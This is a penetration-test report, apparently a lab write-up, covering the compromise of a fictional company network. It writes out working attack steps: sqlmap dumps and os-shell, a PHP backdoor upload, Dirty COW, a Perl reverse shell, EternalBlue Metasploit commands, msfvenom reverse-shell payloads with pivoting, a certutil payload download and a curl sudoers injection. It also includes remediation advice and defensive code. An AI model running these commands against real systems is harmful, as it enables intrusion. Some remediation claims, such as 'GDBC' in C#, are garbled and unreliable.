Els PTP


Penetration Test Report

Table of Contents
1. Introduction
1.1. Scope of Engagement
1.2. Structure of Report
2. Executive Summary
3. Vulnerability Report
3.1. Web Server
3.1.1. Cross Site Scripting (XSS) Injection
3.1.2. Structured Query Language (SQL) Injection
3.1.3. PHP Common Gateway Interface (CGI)
3.1.4. File Upload Restrictions Bypass
3.1.5.1. Privilege Escalation (Dirty Cow)
3.1.5.3. Privilege Escalation (Sudo)
3.1.5.5. Information Disclosure
3.1.5.6. Information Disclosure
3.2. 10.185.10.27
3.2.1. EternalBlue
3.3. Developer Machine
3.4. 10.185.10.55
3.4.1. Buffer Overflow (BOF)
3.5. Demilitarized Zone (DMZ)
3.5.1. Privilege Escalation
4. Remediation Plan
5. Conclusion
6. References

1. Introduction
This report was prepared for the FooPhones company. Its intended readers are the company's managers and the staff responsible for remediating the vulnerabilities it describes.

1.1 Scope of Engagement

Assessment Type: Black Box

Scope of Engagement:

- Web Server: 10.90.60.80
- Domain: foophonesels.com
- Organization Network: 10.185.10.0/23
- Corporate Network: 10.185.10.0/24
- DMZ: 10.185.11.0/24

- The architecture of the environment:

Figure (1) The Organization Structure

Here we can see that we are facing a new challenge. As a penetration tester you have to reach the place everyone is looking for, the DMZ (Demilitarized Zone). This zone holds the most important information and is the most critical part of every organization, and the same is true here. Because it usually holds something important, you cannot reach it except from a trusted machine. Our task is therefore to gain control of a trusted machine on every network, so that we can move from one machine to another and from one network to the next until we reach the DMZ, which is our goal.

1.2 Structure of the Report

This report contains 3 main parts:

- Executive Summary
- Vulnerability Report
- Remediation Plan

The Executive Summary contains the rules of engagement. The Vulnerability Report contains details about each vulnerability and what happens when it is exploited, and the Remediation Plan describes how to mitigate all of them.

2. Executive Summary

Type of Vulnerability          Number of Occurrences
XSS                            5
SQL Injection                  2
Remote Code Execution          3
Buffer Overflow                1
MS17-010 (EternalBlue)         2
Information Disclosure         2
Privilege Escalation           2

3. Vulnerability Report

Here we discuss each IP address and what we found on it, including each vulnerability and its impact.

3.1. 10.90.60.80 (Web Server)

IP: 10.90.60.80
OS: Linux

Port number   Service   Version
80            http      Apache httpd 2.2.8
5923          http      Apache httpd 2.2.8

This is the web server and the first point of interaction with the users. As long as it is not well secured, we can get an initial foothold from here. We usually start enumeration and scanning with tools like Nmap and Nikto, and on this web server we used both.
We ran Nmap with the following command:
nmap -A -sV -vv -p 1-10000 10.90.60.80
The output is shown below:

Figure (2) Nmap-output

We found 3 ports, but the unprotected ones were 80 and 5923. We then ran Nikto: on port 80 it found nothing useful, but on port 5923 it returned very useful results when run as:
nikto -h http://10.90.60.80:5923

Figure (3) Nikto-output

3.1.1 Cross Site Scripting (XSS)

Description: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Impact: Medium

CVE: N/A

Exploitation
While the scans were still running I visited the website on port 80 and found our first XSS.
Visiting http://foophonesels.com redirects to this page:
"foophonesels.com/welcome.php?welcome=<h2>Welcome! <br><br>We're currently working on the new website, but check back soon!</h2>"
The welcome parameter is rendered into the page as HTML, so injecting our XSS payload into it gets the payload executed.

So we inject it like this:

"foophonesels.com/welcome.php?welcome=<script>alert('xss')</script>"

Figure (4) XSS-port80-output

Since we found nothing more here, we now move on to port 5923.

On port 5923 we go to the page /services.php and intercept the request with Burp Suite to modify the input.

Testing for XSS with Burp Suite makes this easier.
The Service-Type parameter is vulnerable to XSS.

The Description field is vulnerable too.

And the same applies to the Service Name field.

/services.php?serviceid=3

3.1.1.2 Remediation:
XSS is remediated in more than one way, and a WAF alone is not enough.

According to the Checkmarx website you can use the 3 methods below:

1. Escaping

The first method you can and should use to prevent XSS vulnerabilities from appearing in your applications is by escaping user input. Escaping data means taking the data an application has received and ensuring it's secure before rendering it for the end user. By escaping user input, key characters in the data received by a web page will be prevented from being interpreted in any malicious way. In essence, you're censoring the data your web page receives in a way that will disallow the characters – especially < and > characters – from being rendered, which otherwise could cause harm to the application and/or users.

2. Validating Input

Validating input is the process of ensuring an application is rendering the correct data and preventing malicious data from doing harm to the site, database, and users. While whitelisting and input validation are more commonly associated with SQL injection, they can also be used as an additional method of prevention for XSS. Whereas blacklisting, or disallowing certain, predetermined characters in user input, disallows only known bad characters, whitelisting only allows known good characters and is a better method for preventing XSS attacks as well as others.

3. Sanitizing

A third way to prevent cross-site scripting attacks is to sanitize user input. Sanitizing data is a strong defense, but should not be used alone to battle XSS attacks. It's totally possible you'll find the need to use all three methods of prevention in working towards a more secure application. Sanitizing user input is especially helpful on sites that allow HTML markup, to ensure data received can do no harm to users as well as your database by scrubbing the data clean of potentially harmful markup, changing unacceptable user input to an acceptable format.
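The three methods above applied to the reflected "welcome" parameter of welcome.php, as an added example that is not code from the report or from the FooPhones site. It assumes the parameter is rendered inside an <h2> element; the character whitelist and the allowed-tag list are design choices constructed for this example.

```python
"""Escaping, validating and sanitizing the 'welcome' parameter (added example)."""
import html
import re
from html.parser import HTMLParser

# 1. Escaping: the value is HTML-encoded before it is placed in the response,
#    so '<' and '>' (and quotes) can never start a tag or an attribute.
def render_welcome_escaped(welcome: str) -> str:
    return "<h2>" + html.escape(welcome, quote=True) + "</h2>"

# 2. Validating input with a whitelist: only the characters a greeting
#    legitimately needs are accepted (assumed character set); anything else
#    is rejected before it reaches the template.
_GREETING_RE = re.compile(r"^[A-Za-z0-9 ,.!'?-]{1,200}$")

def validate_welcome(welcome: str) -> bool:
    return _GREETING_RE.fullmatch(welcome) is not None

# 3. Sanitizing: for a field that legitimately carries markup, keep an
#    allowlist of harmless tags with no attributes, drop the contents of
#    script/style elements, and still escape all text nodes.
_ALLOWED_TAGS = {"h2", "br", "b", "i", "p"}
_DROP_CONTENT = {"script", "style"}

class _AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skipping = 0

    def handle_starttag(self, tag, attrs):
        if tag in _DROP_CONTENT:
            self._skipping += 1
        elif tag in _ALLOWED_TAGS:          # attributes such as onclick are dropped
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in _DROP_CONTENT:
            self._skipping = max(0, self._skipping - 1)
        elif tag in _ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skipping:
            self.out.append(html.escape(data, quote=True))

def sanitize_welcome(welcome: str) -> str:
    parser = _AllowlistSanitizer()
    parser.feed(welcome)
    parser.close()
    return "".join(parser.out)
```

Escaping alone already neutralises the payload shown in the report; validation rejects it outright, and the sanitizer keeps the original <h2>/<br> greeting while discarding the script element and any attributes.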

3.1.2 SQL Injection
There are 2 SQL injections, one on the login page and one on the page that takes the "serviceid=3" parameter. How do you find these? All you need is an error that indicates there is a database behind the page.

Description: SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
Impact: Critical
CVE: N/A

Exploitation

Fuzzing

The error we are looking for

This is the first place where we found SQL injection. Using Burp Suite and sqlmap you can exploit it by capturing the request in Burp Suite, saving it to a text file and passing that file to sqlmap with the following command:
sqlmap --batch -r sqltry.txt --dump-all

This will dump everything it finds


The other way is to inject at the second location, which is "/services.php?serviceid=3". We got the error we were looking for by injecting into the parameter "serviceid=3".

Using sqlmap to get a shell on the web server:

Output of sqlmap

We can get RCE by using "--os-shell" instead of "--dump-all".

3.1.2.2 Remediation
There are lots of ways to mitigate SQL injection, but the one most technical people favour is input validation.

Input Validation:

The validation process is aimed at verifying whether or not the type of input submitted by a user is allowed. Input validation makes sure it is the accepted type, length, format, etc. Only a value which passes the validation can be processed. It helps counteract any commands inserted in the input string. In a way, it is similar to looking to see who is knocking before opening the door.

Validation shouldn't only be applied to fields that allow users to type in input; you should also take care of the following situations in equal measure:

• Use regular expressions as whitelists for structured data (name, age, income, survey response, zip code, etc.) to ensure strong input validation.
• In case of a fixed set of values (drop-down list, radio button, etc.), determine which value is returned. The input data should match one of the offered options exactly.
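The serviceid lookup behind /services.php?serviceid=3 written the injectable way and the remediated way, as an added example that is not the site's code. It combines the whitelist validation described above with a parameterized query, which goes one step beyond the report's recommendation; the in-memory SQLite table, its columns and its rows are constructed for this example.

```python
"""serviceid lookup: string-built query vs. validated + parameterized (added example)."""
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE services (id INTEGER PRIMARY KEY, name TEXT, internal INTEGER)")
    conn.executemany("INSERT INTO services VALUES (?, ?, ?)",
                     [(1, "Screen repair", 0), (2, "Battery swap", 0),
                      (3, "Water damage", 0), (4, "Admin-only audit", 1)])
    return conn

# Vulnerable: the raw parameter is pasted into the query text, so the
# database cannot tell the user's SQL apart from the developer's. A value
# like "3'" produces the syntax error the report looks for, and a value
# like "3 OR 1=1" widens the WHERE clause and returns rows the page should
# never show for one id.
def lookup_service_vulnerable(conn: sqlite3.Connection, serviceid: str):
    sql = f"SELECT id, name FROM services WHERE id = {serviceid} AND internal = 0"
    return conn.execute(sql).fetchall()

# Remediated: whitelist-validate the type first (an id is digits only),
# then bind it as a parameter so the database only ever sees it as a value.
def lookup_service_safe(conn: sqlite3.Connection, serviceid: str):
    if not serviceid.isdigit():
        raise ValueError("serviceid must be a positive integer")
    sql = "SELECT id, name FROM services WHERE id = ? AND internal = 0"
    return conn.execute(sql, (int(serviceid),)).fetchall()

def safe_rejects(serviceid: str) -> bool:
    """True when the remediated lookup refuses the input before any SQL runs."""
    try:
        lookup_service_safe(make_db(), serviceid)
        return False
    except ValueError:
        return True
```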

3.1.3 PHP Common Gateway Interface (CGI)
Description: sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.

Impact: Critical
CVE: CVE-2012-1823

This is the enumeration output from Nikto:

The vulnerability is usually recognised when "-s" is accepted as a parameter on the URL, as Nikto indicated.

As we can see, the source code is exposed by adding -s, so the vulnerability exists!

3.1.3.1 Exploitation
There are 2 ways to exploit this vulnerability: manually, by passing -d instead of -s and running commands, or using Metasploit. I chose the second way because I need Meterpreter later.

3.1.3.2 Remediation
Upgrade to PHP version 5.3.12, PHP version 5.4.2 or newer. As a workaround add the following 'mod_rewrite' rule:
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1?
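Detection logic for the php-cgi issue run over Apache access-log lines, as an added example that is not from the report. It flags any request whose query string matches the same condition as the mod_rewrite workaround above (starts with a dash or %2d and contains no "="), which is what the Nikto finding and the -s probe look like in a log; the log lines, IPs and directive name are constructed for this example.

```python
"""Flag php-cgi option-style query strings (CVE-2012-1823 pattern) in access logs (added example)."""
import re
from urllib.parse import urlsplit

# Apache combined log format: client IP, request line ("METHOD target PROTO"), status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Same condition as:  RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
# Applied to the raw (undecoded) query string, exactly as mod_rewrite sees it.
_CGI_OPT_RE = re.compile(r"^(%2d|-)[^=]+$", re.IGNORECASE)

# Constructed sample log: two benign requests, three option-style ones,
# and one with a dash inside a normal key=value query that must not match.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?-s HTTP/1.1" 200 5120
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?%2Ds HTTP/1.1" 200 5120
10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?-d+php_directive%3Dvalue HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /services.php?serviceid=3 HTTP/1.1" 200 1024
10.0.0.7 - - [10/Oct/2023:13:56:10 +0000] "GET /welcome.php?welcome=-hello HTTP/1.1" 200 900
"""

def is_cgi_option_query(target: str) -> bool:
    """True when the request target's query string looks like a php-cgi option."""
    query = urlsplit(target).query
    return bool(query) and _CGI_OPT_RE.match(query) is not None

def find_cgi_option_requests(log_text: str):
    """Return (client_ip, target, status) for every matching request line."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if m and is_cgi_option_query(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits
```

A hit with status 200 after the patch or the rewrite rule is applied means the workaround is not in effect on that virtual host and should be investigated.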

3.1.4 File Upload Restriction Bypass
Description: Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code onto the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.
Impact: High
CVE: N/A

I was running dirb in the background and it found a page called "/accounts.php", where we can add a new service.

I can upload anything, so we upload a PHP backdoor to test.

I find it under "/pdf".

I got remote command execution using the file upload.

3.1.4.2 Remediation
There are lots of ways to mitigate this; let's look at a few of them.

- "Content-Type" Header Validation

The "Content-Type" entity in the header of the request indicates the Internet media type of the message content. Sometimes web applications use this parameter in order to recognise a file as a valid one. For instance, they only accept the files with the "Content-Type" of "text/plain".

• It is possible to bypass this protection by changing this parameter in the request header using a web proxy.

- Whitelisting File Extensions

Applications that check the file extensions using a whitelist method also need to validate the full filename to prevent any bypass.

• The list of permitted extensions should be reviewed as it can contain malicious extensions as well. For instance, in case of having ".shtml" in the list, the application can be vulnerable to SSI attacks.
• Some of the bypass techniques for the blacklist methods such as using double extensions are also applicable here and should be checked.

- Using a File Type Detector

Sometimes web applications intentionally or unintentionally use some functions (or APIs) to check the file types in order to process them further. For instance, when an application resizes an image file, it may just show an error message when non-image files are uploaded without saving them on the server.

• If it reads the first few characters (or headers), it can be bypassed by inserting malicious code after some valid header or within the file's metadata.
• Inserting code in the comments section or those sections that have no effect on the main file can also lead to a bypass.
• The inserted data can be obfuscated or encoded if the application detects malicious code using specific patterns or signatures.
• The uploaded file can be crafted to create malicious code in case of being compressed by the application.
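A server-side upload check that applies the three points above (ignore Content-Type, whitelist every extension in the full filename, detect the real type from the leading bytes) and then stores the file under a random name with the whitelisted extension outside the web root, as an added example that is not the site's code. The allowed types, magic bytes, upload directory and sample file contents are constructed for this example.

```python
"""Upload validation for the accounts.php service form (added example)."""
import os
import secrets

# Allowed types: extension -> leading bytes ("magic") the content must carry.
ALLOWED = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
UPLOAD_DIR = "/srv/foophones/uploads"   # assumption: a directory outside the web root

class UploadRejected(ValueError):
    pass

def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return the path the file may be stored under, or raise UploadRejected."""
    # 1. Content-Type is client-controlled (see the proxy bypass above), so it
    #    is deliberately not consulted; the parameter is kept only for the API.
    del content_type
    # 2. Check every extension of the full filename, not just the last one, so
    #    "shell.pdf.php" and "shell.php.pdf" are both rejected.
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or any(p == "" for p in parts):
        raise UploadRejected("filename must be of the form name.ext")
    exts = parts[1:]
    if any(e not in ALLOWED for e in exts):
        raise UploadRejected(f"extension not permitted: {base}")
    ext = exts[-1]
    # 3. The content must start with the magic bytes of the claimed type.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected(f"content does not look like .{ext}")
    # 4. Never keep the user's name. A random name with the whitelisted
    #    extension, stored outside the web root, means code embedded after a
    #    valid header (the bypass above) is never served or executed as a script.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return os.path.join(UPLOAD_DIR, stored)

def upload_rejected(filename: str, content_type: str, data: bytes) -> bool:
    """True when validate_upload refuses the file."""
    try:
        validate_upload(filename, content_type, data)
        return False
    except UploadRejected:
        return True
```

Step 3 still accepts a file with a valid PDF header and code appended, which is exactly the bypass the text describes; step 4 is what keeps such a file from being executable.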

3.1.5 Privilege Escalation (using Dirty COW)

Description: Dirty COW (dirty copy-on-write) is a computer security vulnerability in the Linux kernel that affects all Linux-based operating systems, including Android, that use older versions of the Linux kernel. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. The vulnerability was discovered by Phil Oester.

Impact: Critical
CVE: CVE-2016-5195

3.1.5.1 Exploitation
We found 3 ways to get inside (sqlmap SQLi, Metasploit php-cgi, file upload); I will use the Metasploit module.
After dropping into a shell I need a proper interactive (TTY) shell to run the exploit, which I get with python:
python -c 'import pty; pty.spawn("/bin/sh")'

By typing uname -a we can check whether this Linux version is exploitable or not.

Now I start a Python SimpleHTTPServer to transfer files to the victim machine:
python -m SimpleHTTPServer
and then on the victim machine we download our exploit dirty.c.

After downloading dirty.c (the Dirty COW exploit), compile it with:
gcc -pthread dirty.c -o dirty -lcrypt
then run it: ./dirty password
Now we have a new user in the root group called firefart, so all we do is switch to this user using su:
su firefart
then enter your password, and you become the user firefart, which is root.

3.1.5.2 Remediation
Download the latest Ubuntu or Linux version and use it; this exploit only affects old versions.

3.1.5.3 Another Privilege Escalation:

After running sudo -l I found that there is a script that can be run as root, so by putting a Perl reverse shell in it and running the script as root I gain root.

I got a Perl reverse shell from here:

https://github.com/pentestmonkey/perl-reverse-shell/blob/master/perl-reverse-shell.pl

I downloaded it and called it backup.py.

We change $ip to our IP and $port to our port, then I upload it to the victim machine as before using the Python simple HTTP server, put it at /root/backup.pl and run /root/backup.pl as root (backup.pl is now our reverse shell!).

And then we got root.

3.1.5.4 Remediation
A low-privileged user should not be able to run commands as root under any circumstances, and should not be able to modify a file that belongs to root or lives in the root directory.

3.1.5.5 Information Disclosure

While enumerating I found some credentials in a file in the directory "/home/Michael" that lead to the next step.

There is another information disclosure for the database connection.

3.2. 10.185.10.27

IP: 10.185.10.27
OS: Windows 7

Port Number   Service Running
135           SMB
139           SMB
445           Netbios

3.2.1 EternalBlue

Description: EternalBlue is the name given to a software vulnerability in Microsoft's Windows operating system. The tech giant has called it EternalBlue MS17-010 and issued a security update for the flaw on March 14. The patch was issued before the WannaCry ransomware spread around the world and those who had updated early would have been protected.
Impact: Critical
CVE: CVE-2017-0144

3.2.1.1 Exploitation
In order to gain access to the 10.185.10.0/24 subnet I had to route through the compromised Linux machine (the web server), so I ran autoroute from Meterpreter:
autoroute -s 10.185.10.0/24

Now let's see whether any host is alive on the next subnet using ping_sweep:

We found 3 hosts:
10.185.10.1, 10.185.10.27, 10.185.10.34
I assume the first one is the gateway, and I didn't find anything useful on it, but the other 2 were interesting. I scanned them first with the portscan module and then again with the auxiliary module:
Port Scan Module

auxiliary/admin/smb/ms17_010_command
Then I went for the EternalBlue exploit, which is the psexec module, using the following commands in Metasploit:

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.185.10.27
set payload windows/meterpreter/bind_tcp
run

And we are in:

While enumerating, this file was found:

It would lead to the next target.

3.2.1.2 Remediation
If you want to keep using Windows 7 it has to be patched according to the Microsoft article:

https://support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-installed

but it is better to upgrade to the latest version of Windows 10 or another currently supported operating system.

3.3 10.185.10.34 (Developer Machine)

IP: 10.185.10.34
OS: Windows 7

Port Number   Service Running
135           SMB
139           SMB
445           NetBios

Exploitation!
We use the same Metasploit module to log in to 10.185.10.34, as it has proven to be vulnerable, but with a slight difference: the module needs a username and password first. Luckily we have them from the web server: the username was share_admin and the password was "Wind0wz87!kj".
Let's start the compromise using the same Metasploit module.

3.3.1 Remediation
The same steps taken for 10.185.10.27 should be done for this machine too.

We then found these 3 files, which indicate a connection to another machine, 10.185.10.55:

So let's run the ARP post module:

exploit/windows/gather/arp_scanner

And we found 10.185.10.55, the host we were looking for, which has the buffer overflow shell.

3.4. 10.185.10.55

Port Number   Service Running
4242          Customer Manager Portal

3.4.1 Buffer Overflow

Description: A buffer overflow, or buffer overrun, is a common software coding mistake that an attacker could exploit to gain access to your system. To effectively mitigate buffer overflow vulnerabilities, it is important to understand what buffer overflows are, what dangers they pose to your applications, and what techniques attackers use to successfully exploit these vulnerabilities.

Impact: High
CVE: N/A

Now we have a buffer overflow.

The file CustomerManagerClient.py:

After fuzzing with mona by typing !mona pc 200 I found that it is a buffer overflow and that 200 bytes are enough to trigger it. I did it in 2 ways, so I will explain what I did.
First I used the Metasploit pattern_create and mona to validate my output.

I add the junk pattern and send the exploit to check my results.

And it crashes at this address:

Now I have to get the offset, and I can do that in 2 ways:
1- Using mona
2- With Metasploit
Using mona looks like the following:

I type "!mona po 39654138" and it gives me 146.

2- Using Metasploit I use pattern_offset:

And I still get 146, so I can now use 146. My exploit looks like this:
my exploit is like that :

The IP is 192.168.1.2 because I am still testing in my local environment before publishing the exploit.
And "BBBB" is there to validate the correct EIP value: did we hit it or not?

And it seems we did.

Now we add the bad characters to find out which ones are bad,
and we have "\x00" and "\x0A".
I want the jmp esp address, so I use mona to get it.
The jmp esp address, as shown below, is:

"080414c3"
The application is little endian, so I type it in reverse:
"\xc3\x14\x04\x08"
So this is our jump address. I set a breakpoint and ran it over and over to make sure it works, and it did. Now the last hard part: the shell. How can I get it while the target is on another subnet and the connection has to pass through 2 machines first?
I figured out I have to receive it on one of my compromised machines, either the developer machine or 10.185.10.27.

So this is the exploit without any shell.

"\x90" is a no-operation sled to avoid the shellcode overwriting itself. Let's create our msfvenom reverse shell:
msfvenom -p windows/shell/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -f py

This is a little tricky: I have to make the reverse shell connection travel 10.185.10.55 -> 10.185.10.34 -> 10.90.60.80 -> my IP.
I can do that in more than one way: using iptables, using run autoroute -s in Meterpreter, or the manual way. I chose the manual way because I couldn't make the other 2 work.
The manual way uses netsh on Windows and netcat or socat on Linux.

On Windows 10.185.10.34:
netsh interface portproxy add v4tov4 listenaddress=10.185.10.34 listenport=1313 connectaddress=10.90.60.80 connectport=1313

Now on the Linux machine:

socat TCP-LISTEN:1313,bind=10.90.60.80,fork,reuseaddr TCP:172.16.40.5:1313 &

And then finally we use socks4a.

Why socks4a? To bind all of this together. Why 0.0.0.0? For any interface; I could make it 127.0.0.1 or whatever I want.

And in the file "/etc/proxychains.conf" we add it.

Now let's run our exploit using proxychains, but first let's configure our listener in Metasploit.

And we are inside as "NT Authority\System".
Now I do the same to get a reverse shell over Meterpreter, but this time over port 3030.

We make a shell using msfvenom and serve it using the Python simple HTTP server.

Using the certutil command we download it:

certutil -urlcache -split -f http://10.185.10.55:1313/exp.exe C:\\exp.exe

And finally we got a reverse shell over Meterpreter. Now let's enumerate the machine to get as much information as we can.

3.4.2 Remediation
Use a more modern language like C#; since it has GDBC it is almost immune to such attacks. You always have to find your vulnerabilities before someone else does, and avoid dangerous functions and parameters, like "strcpy" in C. Always review your code, or have someone else review it, before putting it into use.

3.5 DMZ (Demilitarized Zone)

IP: 10.185.11.127
OS: Linux

Port Number   Service
22            SSH

What we were able to find here is a vulnerable WinSCP, using Metasploit again.

3.5.1. Privilege Escalation
We got a username and password!
I try to find more hosts,

but there is nothing, only this one.

I think we can use proxychains now to log in to Jeremy's SSH in the DMZ.

And we are in.
Now let's enumerate jeremy's directory.

And we find something interesting:

So I can run a file as root through localhost. OK, let's try to add the sudoers rule (ALL:ALL):
curl -d "z=echo '%jeremy ALL=(root:root) ALL' >> /etc/sudoers" http://127.0.0.1:8989/z-cmd.php
And finally we are root!

4. Remediation Plan
As for the web server, always be sure to use the latest versions of everything, for example the PHP version. Make sure to use input validation and never trust the user's input; this will solve all of the problems regarding XSS, SQL injection and file upload, but only if you validate the input.

From my point of view everything comes down to the mistake of not patching; if everything had been patched it would have been better. The Windows machines need to be patched, and the software needs code review from a security perspective and penetration testing as well.

1- XSS:
   a. Validating input
   b. Escaping
   c. Sanitizing
2- SQL Injection:
   a. All it needs is input validation
3- php-CGI:
   a. Upgrade to the latest version of PHP
4- File Upload Restriction:
   a. Blacklisting file extensions
   b. Beating getimagesize
   c. Whitelisting file extensions
   d. "Content-Type" header validation
   e. Using a file type detector
5- Privilege Escalation:
   a. Upgrade to the latest Linux (Ubuntu or whatever) version
   b. As for sudo, don't let any user run any script with high privilege and don't give the user any permission over the root directory
6- EternalBlue:
   a. The MS17-010 update is the perfect solution for this
   b. It is always good to have the latest Windows, or an OS supported by Microsoft, if you are using it
7- Buffer Overflow:
   a. Always pentest any application before using or publishing it, and always try to use a secure language like C# and the .NET libraries, which have GDBC; and try to implement secure-coding mechanisms in any language that has no protection against buffer overflows, like C and C++

Host (IP)        Open Ports       Services                     Access Obtained   Vulnerabilities Exploited
10.90.60.80      80, 5923         http                         YES               PHP-CGI, XSS, SQL Injection, Unrestricted File Upload, Information Disclosure, Privilege Escalation
10.185.10.27     135, 139, 445    RPC, NETBIOS, SMB, RTSP      YES               EternalBlue, Information Disclosure
10.185.10.34     135, 139, 445    RPC, NetBIOS, SMB            YES               EternalBlue
10.185.10.1      135              RPC                          NO                -
10.185.10.55     42424            Customer-Manager Portal      YES               Buffer Overflow (BOF)
10.185.11.127    22               ssh                          YES               Privilege Escalation
10.185.11.1      135              RPC                          No                -

5. Summary and Conclusion

The company can be hacked in a matter of hours by a dedicated attacker, so the security vulnerabilities should be patched as soon as possible, and penetration tests should be carried out on a regular basis to make sure everything is running well. After all this I deleted all my footholds and cleaned the house by resetting the labs.
Thanks

6. References

https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
https://www.checkmarx.com/2017/10/09/3-ways-prevent-xss/
https://en.wikipedia.org/wiki/Dirty_COW
https://beyondsecurity.com/scan-pentest-network-vulnerabilities-php-cgi-query-string-codeexecution.html
https://owasp.org/www-community/attacks/SQL_Injection
https://owasp.org/www-community/attacks/xss/
https://en.wikipedia.org/wiki/EternalBlue
https://netsec.ws/?p=337
